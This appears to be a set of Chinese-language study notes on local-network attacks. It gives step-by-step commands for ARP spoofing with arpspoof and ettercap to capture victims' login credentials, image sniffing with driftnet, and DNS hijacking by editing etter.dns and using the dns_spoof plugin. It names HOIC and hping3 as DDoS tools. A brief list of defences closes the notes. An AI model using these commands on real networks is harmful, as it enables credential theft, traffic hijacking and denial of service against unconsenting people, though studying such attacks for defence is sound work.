ARP欺骗
需进入局域网 且没有防火墙
查找该网段存活主机
fping -a -g 192.168.127.x/24
arp欺骗
arpspoof -i eth0(网卡) -t 10.10.10.18(受害者) 10.10.10.2(网卡)
centos网卡默认eth33
-i 使用那个网卡
-t 攻击目标
受害者无法联网
echo 1 > /proc/sys/net/ipv4/ip_forward
受害者可以联网
ettercap -Tq -i eth0
受害者登录任意页面=>获取账号密码
apt-get install driftnet
driftnet -i eth0 -a -d dir
http://car.chexun.com/photo/
DNS劫持
DNS服务器
ARP欺骗
kali操作:
vim /etc/ettercap/etter.dns
添加域名指向的ip 如*.baidu.com A 220.173.60.58
ettercap
探测网段scan for hosts 靶机Add to target1 网关Add to target2
manage plugins => dns_spoof
mitm => ARP pos...
DDOS
分布式拒绝服务攻击
分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同时造成的经济损失也是非常巨大的。windows
HOIC=>ddoskali
hping3
防御:
防火墙=>封禁端口
禁用mac地址
ipip.net
增加带宽(专线)
流量清洗(防火墙流量池)
CDN(云盾) 清洗功能